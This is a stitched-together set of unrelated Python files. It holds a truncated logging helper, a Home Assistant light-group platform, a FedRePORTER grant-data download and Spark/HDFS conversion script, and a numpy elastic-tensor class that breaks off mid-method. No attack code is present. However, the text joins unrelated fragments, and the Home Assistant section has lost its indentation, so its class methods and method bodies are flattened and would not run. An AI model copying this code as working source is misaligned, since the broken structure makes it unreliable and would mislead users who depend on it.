            # Truncate over-long lines and mark them with an ellipsis.
            line = line[:extent] + '...'
        utils.stderr(line)
def safestr(text):
    """
    Safely convert unicode to a string
    """
    if text is None:
        return None
    try:
        return str(text)
    except UnicodeEncodeError:
        # Legacy fallback: encode to UTF-8 bytes first.
        return str(text.encode('utf-8'))
| |
"""This platform allows several lights to be grouped into one light."""
import asyncio
from collections import Counter
import itertools
import logging
from typing import Any, Callable, Iterator, List, Optional, Tuple, cast
import voluptuous as vol
from homeassistant.components import light
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_COLOR_TEMP,
ATTR_EFFECT,
ATTR_EFFECT_LIST,
ATTR_FLASH,
ATTR_HS_COLOR,
ATTR_MAX_MIREDS,
ATTR_MIN_MIREDS,
ATTR_TRANSITION,
ATTR_WHITE_VALUE,
PLATFORM_SCHEMA,
SUPPORT_BRIGHTNESS,
SUPPORT_COLOR,
SUPPORT_COLOR_TEMP,
SUPPORT_EFFECT,
SUPPORT_FLASH,
SUPPORT_TRANSITION,
SUPPORT_WHITE_VALUE,
)
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_SUPPORTED_FEATURES,
CONF_ENTITIES,
CONF_NAME,
STATE_ON,
STATE_UNAVAILABLE,
)
from homeassistant.core import CALLBACK_TYPE, State, callback
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.event import async_track_state_change
from homeassistant.helpers.typing import ConfigType, HomeAssistantType
from homeassistant.util import color as color_util
# mypy: allow-incomplete-defs, allow-untyped-calls, allow-untyped-defs
# mypy: no-check-untyped-defs
_LOGGER = logging.getLogger(__name__)

DEFAULT_NAME = "Light Group"

# Platform config: an optional friendly name plus the member light
# entities that make up the group.
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
    {
        vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
        vol.Required(CONF_ENTITIES): cv.entities_domain(light.DOMAIN),
    }
)

# Union of all light features a group can potentially advertise.
SUPPORT_GROUP_LIGHT = (
    SUPPORT_BRIGHTNESS
    | SUPPORT_COLOR_TEMP
    | SUPPORT_EFFECT
    | SUPPORT_FLASH
    | SUPPORT_COLOR
    | SUPPORT_TRANSITION
    | SUPPORT_WHITE_VALUE
)
async def async_setup_platform(
    hass: HomeAssistantType, config: ConfigType, async_add_entities, discovery_info=None
) -> None:
    """Initialize light.group platform."""
    name = cast(str, config.get(CONF_NAME))
    group = LightGroup(name, config[CONF_ENTITIES])
    async_add_entities([group])
class LightGroup(light.Light):
"""Representation of a light group."""
def __init__(self, name: str, entity_ids: List[str]) -> None:
    """Initialize a light group."""
    self._name = name
    self._entity_ids = entity_ids
    # Aggregated state; presumably refreshed from the member lights by the
    # group's update logic (not visible in this chunk) - confirm.
    self._is_on = False
    self._available = False
    self._brightness: Optional[int] = None
    self._hs_color: Optional[Tuple[float, float]] = None
    self._color_temp: Optional[int] = None
    self._min_mireds: Optional[int] = 154
    self._max_mireds: Optional[int] = 500
    self._white_value: Optional[int] = None
    self._effect_list: Optional[List[str]] = None
    self._effect: Optional[str] = None
    self._supported_features: int = 0
    # Unsubscribe callback for the state-change listener; set in
    # async_added_to_hass, cleared in async_will_remove_from_hass.
    self._async_unsub_state_changed: Optional[CALLBACK_TYPE] = None
async def async_added_to_hass(self) -> None:
    """Register callbacks."""

    @callback
    def async_state_changed_listener(
        entity_id: str, old_state: State, new_state: State
    ):
        """Handle child updates."""
        # Any member change schedules a forced refresh of the group state.
        self.async_schedule_update_ha_state(True)

    assert self.hass is not None
    # Track every member entity so the group reacts to their changes.
    self._async_unsub_state_changed = async_track_state_change(
        self.hass, self._entity_ids, async_state_changed_listener
    )
    # Prime the group state from the members' current states.
    await self.async_update()
async def async_will_remove_from_hass(self):
    """Handle removal from Home Assistant."""
    # Guard clause: nothing to do when no listener was registered.
    if self._async_unsub_state_changed is None:
        return
    self._async_unsub_state_changed()
    self._async_unsub_state_changed = None
@property
def name(self) -> str:
    """Return the name of the entity."""
    # Set once in __init__ from the CONF_NAME option.
    return self._name
@property
def is_on(self) -> bool:
    """Return the on/off state of the light group."""
    # Aggregate value maintained by the group's update logic.
    return self._is_on
@property
def available(self) -> bool:
    """Return whether the light group is available."""
    # Aggregate value maintained by the group's update logic.
    return self._available
@property
def brightness(self) -> Optional[int]:
    """Return the brightness of this light group between 0..255."""
    # None until a member reports a brightness.
    return self._brightness
@property
def hs_color(self) -> Optional[Tuple[float, float]]:
    """Return the HS color value [float, float]."""
    # None until a member reports a color.
    return self._hs_color
@property
def color_temp(self) -> Optional[int]:
    """Return the CT color value in mireds."""
    # None until a member reports a color temperature.
    return self._color_temp
@property
def min_mireds(self) -> Optional[int]:
"""Return the coldest color_temp that this light group supports."""
return self._min_mireds
@property
def max_mireds(self) -> Optional[int]:
"""Return the warmest color_temp that this light group supports."""
return self._max_mireds
@property
def white_value(self) -> Optional[int]:
"""Return the white value of this light group between 0..255."""
return self._white_value
@property
def effect_list(self) -> Optional[List[str]]:
"""Return the list of supported effects."""
return self._effect_list
@property
def effect(self) -> Optional[str]:
"""Return the current effect."""
return self._effect
@property
def supported_features(self) -> int:
"""Flag supported features."""
return self._supported_features
@property
def should_poll(self) -> bool:
"""No polling needed for a light group."""
return False
async def async_turn_on(self, **kwargs):
"""Forward the turn_on command to all lights in the light group."""
data = {ATTR_ENTITY_ID: self._entity_ids}
emulate_color_temp_entity_ids = []
if ATTR_BRIGHTNESS in kwargs:
data[ATTR_BRIGHTNESS] = kwargs[ATTR_BRIGHTNESS]
if ATTR_HS_COLOR in kwargs:
data[ATTR_HS_COLOR] = kwargs[ATTR_HS_COLOR]
if ATTR_COLOR_TEMP in kwargs:
data[ATTR_COLOR_TEMP] = kwargs[ATTR_COLOR_TEMP]
# Create a new entity list to mutate
updated_entities = list(self._entity_ids)
# Walk through initial entity ids, split entity lists by support
for entity_id in self._entity_ids:
state = self.hass.states.get(entity_id)
if not state:
continue
support = state.attributes.get(ATTR_SUPPORTED_FEATURES)
# Only pass color temperature to supported entity_ids
if bool(support & SUPPORT_COLOR) and not bool(
support & SUPPORT_COLOR_TEMP
):
emulate_color_temp_entity_ids.append(entity_id)
updated_entities.remove(entity_id)
data[ATTR_ENTITY_ID] = updated_entities
if ATTR_WHITE_VALUE in kwargs:
data[ATTR_WHITE_VALUE] = kwargs[ATTR_WHITE_VALUE]
if ATTR_EFFECT in kwargs:
data[ATTR_EFFECT] = kwargs[ATTR_EFFECT]
if ATTR_TRANSITION in kwargs:
data[ATTR_TRANSITION] = kwargs[ATTR_TRANSITION]
if ATTR_FLASH in kwargs:
data[ATTR_FLASH] = kwargs[ATTR_FLASH]
if not emulate_color_temp_entity_ids:
await self.hass.services.async_call(
light.DOMAIN, light.SERVICE_TURN_ON, data, blocking=True
)
return
emulate_color_temp_data = data.copy()
temp_k = color_util.color_temperature_mired_to_kelvin(
emulate_color_temp_data[ATTR_COLOR_TEMP]
)
hs_color = color_util.color_temperature_to_hs(temp_k)
emulate_color_temp_data[ATTR_HS_COLOR] = hs_color
del emulate_color_temp_data[ATTR_COLOR_TEMP]
emulate_color_temp_data[ATTR_ENTITY_ID] = emulate_color_temp_entity_ids
await asyncio.gather(
self.hass.services.async_call(
light.DOMAIN, light.SERVICE_TURN_ON, data, blocking=True
),
self.hass.services.async_call(
light.DOMAIN,
light.SERVICE_TURN_ON,
emulate_color_temp_data,
blocking=True,
),
)
async def async_turn_off(self, **kwargs):
"""Forward the turn_off command to all lights in the light group."""
data = {ATTR_ENTITY_ID: self._entity_ids}
if ATTR_TRANSITION in kwargs:
data[ATTR_TRANSITION] = kwargs[ATTR_TRANSITION]
await self.hass.services.async_call(
light.DOMAIN, light.SERVICE_TURN_OFF, data, blocking=True
)
async def async_update(self):
"""Query all members and determine the light group state."""
all_states = [self.hass.states.get(x) for x in self._entity_ids]
states: List[State] = list(filter(None, all_states))
on_states = [state for state in states if state.state == STATE_ON]
self._is_on = len(on_states) > 0
self._available = any(state.state != STATE_UNAVAILABLE for state in states)
self._brightness = _reduce_attribute(on_states, ATTR_BRIGHTNESS)
self._hs_color = _reduce_attribute(on_states, ATTR_HS_COLOR, reduce=_mean_tuple)
self._white_value = _reduce_attribute(on_states, ATTR_WHITE_VALUE)
self._color_temp = _reduce_attribute(on_states, ATTR_COLOR_TEMP)
self._min_mireds = _reduce_attribute(
states, ATTR_MIN_MIREDS, default=154, reduce=min
)
self._max_mireds = _reduce_attribute(
states, ATTR_MAX_MIREDS, default=500, reduce=max
)
self._effect_list = None
all_effect_lists = list(_find_state_attributes(states, ATTR_EFFECT_LIST))
if all_effect_lists:
# Merge all effects from all effect_lists with a union merge.
self._effect_list = list(set().union(*all_effect_lists))
self._effect = None
all_effects = list(_find_state_attributes(on_states, ATTR_EFFECT))
if all_effects:
# Report the most common effect.
effects_count = Counter(itertools.chain(all_effects))
self._effect = effects_count.most_common(1)[0][0]
self._supported_features = 0
for support in _find_state_attributes(states, ATTR_SUPPORTED_FEATURES):
# Merge supported features by emulating support for every feature
# we find.
self._supported_features |= support
# Bitwise-and the supported features with the GroupedLight's features
# so that we don't break in the future when a new feature is added.
self._supported_features &= SUPPORT_GROUP_LIGHT
def _find_state_attributes(states: List[State], key: str) -> Iterator[Any]:
    """Yield the non-None values of attribute *key* across *states*."""
    for current in states:
        attr_value = current.attributes.get(key)
        if attr_value is None:
            continue
        yield attr_value
def _mean_int(*args):
"""Return the mean of the supplied values."""
return int(sum(args) / len(args))
def _mean_tuple(*args):
"""Return the mean values along the columns of the supplied values."""
return tuple(sum(l) / len(l) for l in zip(*args))
def _reduce_attribute(
    states: List[State],
    key: str,
    default: Optional[Any] = None,
    reduce: Callable[..., Any] = _mean_int,
) -> Any:
    """Combine attribute *key* across *states*.

    Returns *default* when no state exposes the attribute, the lone value
    when exactly one does, and reduce(*values) otherwise.
    """
    found = tuple(_find_state_attributes(states, key))
    if not found:
        return default
    if len(found) == 1:
        return found[0]
    return reduce(*found)
| |
import sys
from subprocess import call
import pandas as pd
import os
import findspark
findspark.init()
from pyspark.sql import SparkSession
# Column schema of the FedRePORTER "PRJ" project CSV extracts.  The files
# are read with header=None, so these names are supplied explicitly to
# pandas.read_csv (the embedded header row is dropped later).
COLNAMES = ['SM_Application_ID', 'Project_Terms', 'Project_Title', 'Department', 'Agency', 'IC_Center',
            'Project_Number', 'Project_Start_Date', 'Project_End_Date', 'Contact_PI_Project_Leader', 'Other_PIs',
            'Congressional_District', 'DUNS_Number', 'Organizational_Name', 'Organization_City', 'Organization_State',
            'Organization_Zip', 'Organization_Country', 'Budget_Start_Date', 'Budget_End_Date', 'CFDA_Code', 'FY',
            'FY_Total_Cost', 'FY_Total_Cost_Sub_Projects']
def download_project_csv(year):
    """Download and unzip the FedRePORTER project archive for *year*."""
    archive = "FedRePORTER_PRJ_C_FY" + str(year) + ".zip"
    url = ("https://federalreporter.nih.gov/FileDownload/DownloadFile"
           "?fileToDownload=" + archive)
    call(['wget', '-O', archive, url])
    call(['unzip', '-o', archive])
def download_abstract_csv(year):
    """Download and unzip the FedRePORTER abstracts archive for *year*."""
    archive = "FedRePORTER_PRJABS_C_FY" + str(year) + ".zip"
    url = ("https://federalreporter.nih.gov/FileDownload/DownloadFile"
           "?fileToDownload=" + archive)
    call(['wget', '-O', archive, url])
    call(['unzip', '-o', archive])
def process_document_csv(year):
    """Build Grant_Document_<year>.csv from the project and abstract files.

    Selects the document-related project columns, joins the abstract text
    on the application id, and writes the merged table to disk.
    """
    filename = "FedRePORTER_PRJ_C_FY" + str(year) + ".csv"
    Grants = pd.read_csv(filename, header=None, names=COLNAMES, encoding="ISO-8859-1", low_memory=False)

    # Keep only the document-related columns, renamed for the output schema.
    # (The original Summary column was added and immediately dropped, so it
    # is simply not carried over here.)
    my_dataframe = pd.DataFrame({
        'Grant_ID': Grants.SM_Application_ID,
        'Project_Title': Grants.Project_Title,
        'Year': Grants.FY,
        'Start_Date': Grants.Project_Start_Date,
        'End_Date': Grants.Project_End_Date,
    })
    # Drop the raw file's own header line, which header=None ingested as
    # the first data row.  .iloc replaces the .ix indexer removed in
    # pandas 1.0.
    my_dataframe = my_dataframe.iloc[1:]

    # reading the abstracts from the abstract files
    filename2 = "FedRePORTER_PRJABS_C_FY" + str(year) + ".csv"
    colnames_abs = ['SM_Application_ID', 'Abstract']
    Grants_abs = pd.read_csv(filename2, header=None, names=colnames_abs, encoding="ISO-8859-1")
    # Deleting the first (embedded header) row for the abstract table
    Grants_abs = Grants_abs.iloc[1:]

    # left merge so projects without an abstract are kept
    document_merge = pd.merge(left=my_dataframe, right=Grants_abs, how='left',
                              left_on='Grant_ID', right_on='SM_Application_ID')
    # Drop the redundant join key.  drop(columns=...) replaces the
    # positional axis argument removed in pandas 2.0.
    document_merge = document_merge.drop(columns='SM_Application_ID')

    # creating a new csv and writing the contents from the data frame
    outputfile = "Grant_Document_" + str(year) + ".csv"
    document_merge.to_csv(outputfile, index=False)
def process_scientist_csv(year):
    """Build Grant_Scientist_<year>.csv from the FedRePORTER project file.

    Produces one row per scientist (contact PI plus every "other" PI) with
    the name split into first/last/middle parts, the grant id, a role
    marker, and a synthetic Scientist_ID (name initials + grant id).
    """
    filename = "FedRePORTER_PRJ_C_FY" + str(year) + ".csv"
    Grants = pd.read_csv(filename, header=None, names=COLNAMES, encoding="ISO-8859-1", low_memory=False)

    # ---- contact PIs -------------------------------------------------
    Grants_ID = Grants.SM_Application_ID.tolist()
    Name_List = Grants.Contact_PI_Project_Leader.tolist()
    my_dataframe_test = pd.DataFrame(Name_List, columns=["Name"])
    # Drop the embedded header row.  .iloc replaces the .ix indexer
    # removed in pandas 1.0.
    my_dataframe_test = my_dataframe_test.iloc[1:]
    # Strip punctuation.  regex=False is essential: under the old default
    # (regex=True) the '.' pattern matched *every* character and wiped
    # the entire name.
    my_dataframe_test['Name'] = my_dataframe_test['Name'].str.replace('.', '', regex=False)
    my_dataframe_test['Name'] = my_dataframe_test['Name'].str.replace(',', '', regex=False)
    splits = my_dataframe_test['Name'].str.split()
    # Names appear as "LAST FIRST MIDDLE" -- TODO confirm against data.
    Last_Name = splits.str[0]
    First_Name = splits.str[1]
    Middle_Name = splits.str[2]
    my_dataframe_scientist = pd.concat([First_Name, Last_Name, Middle_Name], axis=1)
    my_dataframe_scientist.columns = ['First_Name', 'Last_Name', 'Middle_Name']
    # adding the Grant ID column to the dataframe
    series_grantID = pd.Series(Grants_ID)
    series_grantID_2 = series_grantID.drop([0])  # drop the header-row value
    my_dataframe_scientist['Grant_ID'] = series_grantID_2.values
    # Contact PIs carry the plain 'PI' role (scalar assignment replaces
    # the over-long helper Series and the stray no-op expression).
    my_dataframe_scientist['Role'] = 'PI'

    # ---- other PIs ---------------------------------------------------
    Other_PIs = Grants.Other_PIs.tolist()
    Grant_ID2 = Grants.SM_Application_ID.tolist()
    series_other_PIs = pd.Series(Other_PIs)
    my_dataframe_sci2 = pd.DataFrame(Grant_ID2, columns=["Grant_ID"])
    my_dataframe_sci2['Other_PIs'] = series_other_PIs.values
    my_dataframe_sci2 = my_dataframe_sci2.iloc[1:]
    # drop grants with no additional PIs
    my_dataframe_sci2 = my_dataframe_sci2[my_dataframe_sci2.Other_PIs.notnull()]
    my_dataframe_sci2['Other_PIs'] = my_dataframe_sci2['Other_PIs'].str.replace(',', '', regex=False)
    # Explode the semicolon-separated PI list into one row per person.
    my_dataframe_sci3 = pd.concat([pd.Series(row['Grant_ID'], row['Other_PIs'].split(';'))
                                   for _, row in my_dataframe_sci2.iterrows()]).reset_index()
    my_dataframe_sci3.columns = ['Other_PIs', 'Grant_ID']
    # drop blank name entries produced by the split
    my_dataframe_sci3 = my_dataframe_sci3[my_dataframe_sci3.Other_PIs != ' ']
    my_dataframe_sci3['Other_PIs'] = my_dataframe_sci3['Other_PIs'].str.replace('.', '', regex=False)
    my_dataframe_sci3 = my_dataframe_sci3[my_dataframe_sci3.Other_PIs != '']
    splits2 = my_dataframe_sci3['Other_PIs'].str.split()
    Last_Name2 = splits2.str[0]
    First_Name2 = splits2.str[1]
    Middle_Name2 = splits2.str[2]
    my_dataframe_sci4 = pd.concat([First_Name2, Last_Name2, Middle_Name2], axis=1)
    my_dataframe_sci4.columns = ['First_Name', 'Last_Name', 'Middle_Name']
    GrantID_OT = my_dataframe_sci3.Grant_ID.tolist()
    series_GrantID_other = pd.Series(GrantID_OT)
    my_dataframe_sci4['Grant_ID'] = series_GrantID_other.values
    my_dataframe_sci4['Role'] = 'Other PI'

    # ---- combine and derive ids --------------------------------------
    # stack the contact-PI and other-PI frames on top of each other
    my_dataframe_scientist_final = pd.concat([my_dataframe_scientist, my_dataframe_sci4])
    my_dataframe_scientist_final = my_dataframe_scientist_final.reset_index()
    del my_dataframe_scientist_final['index']
    # Scientist_ID = first initials of first and last name + grant id.
    my_dataframe_scientist_final['IM_ID'] = my_dataframe_scientist_final['First_Name'].str[:1].astype(str).str.cat(
        my_dataframe_scientist_final['Last_Name'].str[:1].astype(str), sep='')
    my_dataframe_scientist_final['Scientist_ID'] = my_dataframe_scientist_final['IM_ID'].astype(str).str.cat(
        my_dataframe_scientist_final['Grant_ID'].astype(str), sep='')
    # deleting the intermediate column
    del my_dataframe_scientist_final['IM_ID']

    # creating a new csv and writing the contents from the data frame
    outputfile = "Grant_Scientist_" + str(year) + ".csv"
    my_dataframe_scientist_final.to_csv(outputfile, index=False)
def process_organization_csv(year):
    """Build Grant_Organization_<year>.csv from the FedRePORTER project file.

    Extracts organization name/city/state/zip per grant and derives a
    synthetic Org_ID (name+city prefixes + grant id).
    """
    filename = "FedRePORTER_PRJ_C_FY" + str(year) + ".csv"
    Grants = pd.read_csv(filename, header=None, names=COLNAMES, encoding="ISO-8859-1", low_memory=False)

    # save the column lists into separate variables
    Grants_ID = Grants.SM_Application_ID.tolist()
    Organization_Name = Grants.Organizational_Name.tolist()
    Organization_City = Grants.Organization_City.tolist()
    Organization_State = Grants.Organization_State.tolist()
    Organization_Zip = Grants.Organization_Zip.tolist()

    # initial dataframe with only the organization name
    my_dataframe_org = pd.DataFrame(Organization_Name,
                                    columns=["Organization_Name"])
    # adding the remaining columns
    series_City = pd.Series(Organization_City)
    series_State = pd.Series(Organization_State)
    series_Zip = pd.Series(Organization_Zip)
    my_dataframe_org['Organization_City'] = series_City.values
    my_dataframe_org['Organization_State'] = series_State.values
    my_dataframe_org['Organization_Zip'] = series_Zip.values

    # Drop the embedded header row.  .iloc replaces the .ix indexer
    # removed in pandas 1.0.
    my_dataframe_org = my_dataframe_org.iloc[1:]

    # adding the Grant ID column to the dataframe
    series_grantID = pd.Series(Grants_ID)
    series_grantID_2 = series_grantID.drop([0])  # drop the header-row value
    my_dataframe_org['Grant_ID'] = series_grantID_2.values

    # Org_ID = first two chars of name + first two chars of city + grant id.
    my_dataframe_org['IM_ID2'] = my_dataframe_org['Organization_Name'].str[:2].astype(str).str.cat(
        my_dataframe_org['Organization_City'].str[:2].astype(str), sep='')
    my_dataframe_org['Org_ID'] = my_dataframe_org['IM_ID2'].astype(str).str.cat(
        my_dataframe_org['Grant_ID'].astype(str), sep='')
    # deleting the intermediate column
    del my_dataframe_org['IM_ID2']

    # creating a new csv and writing the contents from the data frame
    outputfile = "Grant_Organization_" + str(year) + ".csv"
    my_dataframe_org.to_csv(outputfile, index=False)
def document_parquet(spark, basepath, year):
    """Convert Grant_Document_<year>.csv under *basepath* to parquet."""
    stem = "Grant_Document_" + str(year)
    csv_path = os.path.join(basepath, stem + ".csv")
    parquet_path = os.path.join(basepath, stem + ".parquet")
    frame = spark.read.format("csv").option("header", "true").load(csv_path)
    frame.write.parquet(parquet_path)
def scientist_parquet(spark, basepath, year):
    """Convert Grant_Scientist_<year>.csv under *basepath* to parquet."""
    stem = "Grant_Scientist_" + str(year)
    csv_path = os.path.join(basepath, stem + ".csv")
    parquet_path = os.path.join(basepath, stem + ".parquet")
    frame = spark.read.format("csv").option("header", "true").load(csv_path)
    frame.write.parquet(parquet_path)
def organization_parquet(spark, basepath, year):
    """Convert Grant_Organization_<year>.csv under *basepath* to parquet."""
    stem = "Grant_Organization_" + str(year)
    csv_path = os.path.join(basepath, stem + ".csv")
    parquet_path = os.path.join(basepath, stem + ".parquet")
    frame = spark.read.format("csv").option("header", "true").load(csv_path)
    frame.write.parquet(parquet_path)
if __name__ == '__main__':
    # Usage: script.py <start_year> <end_year> <hdfs_basepath>
    start_year = int(sys.argv[1])
    end_year = int(sys.argv[2])
    basepath = sys.argv[3]
    spark = SparkSession.builder.getOrCreate()
    # Fetch the raw FedRePORTER archives for every requested year.
    for year in range(start_year, end_year + 1):
        download_project_csv(year)
        download_abstract_csv(year)
    # Transform each year's raw files into the three output CSVs.
    for year in range(start_year, end_year + 1):
        process_document_csv(year)
        process_scientist_csv(year)
        process_organization_csv(year)
    # Push the generated CSVs to HDFS.  shell=True is needed so the shell
    # expands the *.csv wildcards.  NOTE(review): basepath is interpolated
    # into a shell command unquoted -- confirm it is trusted input.
    call(' '.join(['hdfs', 'dfs', '-put', 'Grant_Document_*.csv', basepath]), shell=True)
    call(' '.join(['hdfs', 'dfs', '-put', 'Grant_Scientist_*.csv', basepath]), shell=True)
    call(' ' .join(['hdfs', 'dfs', '-put', 'Grant_Organization_*.csv', basepath]), shell=True)
    # Convert the uploaded CSVs to parquet for efficient Spark access.
    for year in range(start_year, end_year + 1):
        document_parquet(spark, basepath, year)
        scientist_parquet(spark, basepath, year)
        organization_parquet(spark, basepath, year)
| |
import numpy as np
class ElasticTensor():
    """
    This class represents a linear fourth-order tensor of elastic parameters
    for both stiffness and compliance. It also evaluates the tensor as a matrix
    using engineering Mandel's or Voigt's notation. The plane stress or strain
    is also available.
    """

    def __init__(self, bulk=None, mu=None, stiffness=True, plane=None):
        """
        Parameters
        ----------
        bulk : float
            bulk modulus (effectively required: the None default raises
            TypeError in float() below)
        mu : float
            shear modulus (effectively required, see above)
        stiffness : boolean
            determines whether the values are evaluated for stiffness (True)
            or for its inverse compliance (False)
        plane : None, 'strain', or 'stress'
            determines the physical problem; None represents three-dimensional
            problem and 'strain' or 'stress' represent reduced problem of plane
            strain or stress respectively
        """
        # BUG FIX: always record the flag.  Previously it was only stored
        # when stiffness=True, so __repr__ raised AttributeError for
        # compliance tensors.
        self.stiffness = stiffness
        if stiffness:
            self.val_type = 'stiffness'
        else:
            self.val_type = 'compliance'

        if plane is None:
            self.dim = 3
        elif plane in ['stress', 'strain']:
            self.dim = 2
        else:
            raise ValueError("This type of plane (%s) is not supported."
                             % str(plane))
        self.plane = plane
        self.sym = self.get_sym(self.dim)
        self.bulk = float(bulk)
        self.mu = float(mu)

        # set up values to tensor and matrices; an isotropic tensor is a
        # weighted sum of the hydrostatic and deviatoric projections
        _, volumetric, deviatoric = self.get_decomposition()
        if stiffness:
            self.val = 3.*bulk*volumetric + 2.*mu*deviatoric
        else:
            self.val = 1./(3*bulk)*volumetric + 1./(2*mu)*deviatoric

        self.mandel = self.create_mandel(self.val)
        self.voigt = self.create_voigt(self.val)

        if plane is not None:
            self.val = self.val[0:2, 0:2, 0:2, 0:2]
            if (stiffness and plane == 'strain') or \
                    (not stiffness and plane == 'stress'):
                # These combinations reduce by plain submatrix extraction.
                self.mandel = self.get_plane_in_engineering(self.mandel)
                self.voigt = self.get_plane_in_engineering(self.voigt)
            elif (not stiffness and plane == 'strain') or \
                    (stiffness and plane == 'stress'):
                # The dual quantities reduce through the inverse matrix.
                inv = np.linalg.inv
                self.mandel = inv(self.get_plane_in_engineering(inv(self.mandel)))
                self.voigt = inv(self.get_plane_in_engineering(inv(self.voigt)))
            else:
                pass

    @staticmethod
    def get_plane_in_engineering(val, ind=None):
        """
        get plane (strain or stress) of matrix in Mandel or Voigt notation

        Parameters:
        val : numpy.ndarray of shape (6,6)
            matrix to transfer to plane
        ind : list or tuple of len 2
            indices of plane axis

        Returns:
        mat : numpy.ndarray of shape (3,3)
            plane matrix
        """
        if ind is None:
            ind = [0, 1]
        else:
            ind = list(ind)
        # the remaining axis determines which shear component to keep
        ind_shear = list(range(3))
        ind_shear.remove(ind[0])
        ind_shear.remove(ind[1])
        ind.append(ind_shear[0]+3)
        mat = val[ind][:, ind]
        return mat

    @staticmethod
    def get_plane_in_tensor(val, ind=None):
        """Extract the plane sub-tensor (or sub-matrix) along axes *ind*."""
        assert(isinstance(val, np.ndarray))
        if ind is None:
            ind = [0, 1]
        if val.shape[:4] == 4*(3,):  # fourth-order tensor
            mat = val[ind][:, ind][:, :, ind][:, :, :, ind]
        elif val.shape[:2] == 2*(3,):  # second-order tensor
            mat = val[ind][:, ind]
        else:
            raise ValueError('Shape {0} of input!'.format(val.shape))
        return mat

    def __repr__(self):
        ss = "Class: %s\n" % (self.__class__.__name__)
        ss += '    stiffness = %s (%s)\n' % (self.stiffness, self.val_type)
        ss += '    dim = %d' % (self.dim)
        if self.plane is None:
            ss += '\n'
        else:
            ss += ' (plane %s)\n' % self.plane
        ss += '    bulk = %s\n' % str(self.bulk)
        ss += '    mu = %s\n' % str(self.mu)
        return ss

    @staticmethod
    def get_sym(dim):
        """Return the number of independent components: dim*(dim+1)/2."""
        # BUG FIX: floor division keeps the count an int under Python 3
        # (true division returned a float).
        return dim*(dim+1)//2

    @staticmethod
    def get_decomposition():
        """
        It produces symmetrized fourth-order identity, hydrostatic, and
        deviatoric projections.

        Returns
        -------
        idsym : numpy.array of shape = (3, 3, 3, 3)
            symmetrized identity operator
        volumetric : numpy.array of shape = (3, 3, 3, 3)
            hydrostatic projection
        deviatoric : numpy.array of shape = (3, 3, 3, 3)
            deviatoric projection
        """
        ids = np.eye(3)
        volumetric = 1./3*np.einsum('ij,kl', ids, ids)
        idsym = 0.5*(np.einsum('ik,jl', ids, ids)
                     + np.einsum('il,jk', ids, ids))
        deviatoric = idsym - volumetric
        return idsym, volumetric, deviatoric

    @staticmethod
    def create_mandel(mat, ndim=None):
        """
        It transfers a symmetric fourth-order tensor (or matrix) to a
        second-order tensor (or vector) using Mandel's notation.

        Parameters
        ----------
        mat : numpy.array of shape = (d, d, d, d) or (d, d) for dimension d
            fourth-order tensor of elastic parameters
        ndim : 2 or 4
            dimensionality of input

        Returns
        -------
        res : numpy.array of shape = (sym, sym) or (sym,) for sym = d*(d+1)/2
            second-order tensor of elastic parameters with Mandel's notation
        """
        dim = mat.shape[0]
        sym = int(dim*(dim+1)/2)
        if ndim is None:
            ndim = mat.ndim
        grid_shape = mat.shape[ndim:]

        if ndim == 4:  # tensor4 -> matrix
            res = np.zeros((sym, sym) + grid_shape, dtype=mat.dtype)
            if dim == 3:
                for ii, jj in np.ndindex(dim, dim):
                    kk = list(range(dim))
                    kk.remove(ii)
                    ll = list(range(dim))
                    ll.remove(jj)
                    res[ii, jj] = mat[ii, ii, jj, jj]
                    # off-diagonal (shear) couplings carry Mandel weights
                    res[ii, jj+dim] = 2**.5*mat[ii, ii, ll[0], ll[1]]
                    res[jj+dim, ii] = res[ii, jj+dim]
                    res[ii+dim, jj+dim] = 2*mat[kk[0], kk[1], ll[0], ll[1]]
            if dim == 2:
                res[2, 2] = 2*mat[0, 1, 0, 1]
                for ii in range(dim):
                    res[ii, 2] = 2**.5*mat[ii, ii, 0, 1]
                    res[2, ii] = 2**.5*mat[0, 1, ii, ii]
                    for jj in range(dim):
                        res[ii, jj] = mat[ii, ii, jj, jj]
        elif ndim == 2:  # matrix -> vector
            res = np.zeros((sym,) + grid_shape, dtype=mat.dtype)
            res[:dim] = np.diag(mat)
            if dim == 2:
                res[dim] = 2**.5*mat[0, 1]
            elif dim == 3:
                for ii in np.arange(sym-dim):
                    ind = list(range(sym-dim))
                    ind.remove(ii)
                    res[dim+ii] = 2**.5*mat[ind[0], ind[1]]
            else:
                raise ValueError("Incorrect dimension (%d)" % dim)
        return res

    @staticmethod
    def dispose_mandel(vec, ndim=2):
        """Inverse of create_mandel: rebuild the tensor (or matrix) from
        its Mandel representation."""
        assert(isinstance(vec, np.ndarray))
        vec = vec.squeeze()
        sym = vec.shape[0]

        def dimfun(sym):
            """
            Inverse function to dim*(dim+1)/2.
            """
            return int((-1.+(1+8*sym)**.5)/2)

        dim = dimfun(sym)
        if ndim is None:
            ndim = vec.ndim
        grid_shape = vec.shape[ndim:]

        if ndim == 2:  # matrix -> tensor4
            assert(vec.shape[0] == vec.shape[1])
            mat = np.zeros(4*(dim,)+grid_shape, dtype=vec.dtype)
            if dim == 3:
                for ii in np.arange(dim):
                    for jj in np.arange(dim):
                        kk = list(range(dim))
                        kk.remove(ii)
                        ll = list(range(dim))
                        ll.remove(jj)
                        mat[ii, ii, jj, jj] = vec[ii, jj]
                        # undo the Mandel weights and restore the minor
                        # symmetries of the tensor
                        mat[ii, ii, ll[0], ll[1]] = vec[ii, jj+dim] / 2**.5
                        mat[ii, ii, ll[1], ll[0]] = vec[ii, jj+dim] / 2**.5
                        mat[ll[0], ll[1], ii, ii] = mat[ii, ii, ll[0], ll[1]]
                        mat[ll[1], ll[0], ii, ii] = mat[ii, ii, ll[0], ll[1]]
                        mat[kk[0], kk[1], ll[0], ll[1]] = vec[ii+dim, jj+dim] / 2.
                        mat[kk[1], kk[0], ll[0], ll[1]] = vec[ii+dim, jj+dim] / 2.
                        mat[kk[0], kk[1], ll[1], ll[0]] = vec[ii+dim, jj+dim] / 2.
                        mat[kk[1], kk[0], ll[1], ll[0]] = vec[ii+dim, jj+dim] / 2.
            elif dim == 2:
                mat[0, 1, 0, 1] = vec[2, 2]/2.
                mat[0, 1, 1, 0] = vec[2, 2]/2.
                mat[1, 0, 0, 1] = vec[2, 2]/2.
                mat[1, 0, 1, 0] = vec[2, 2]/2.
                for ii in range(dim):
                    mat[ii, ii, 0, 1] = vec[ii, 2]/2**.5
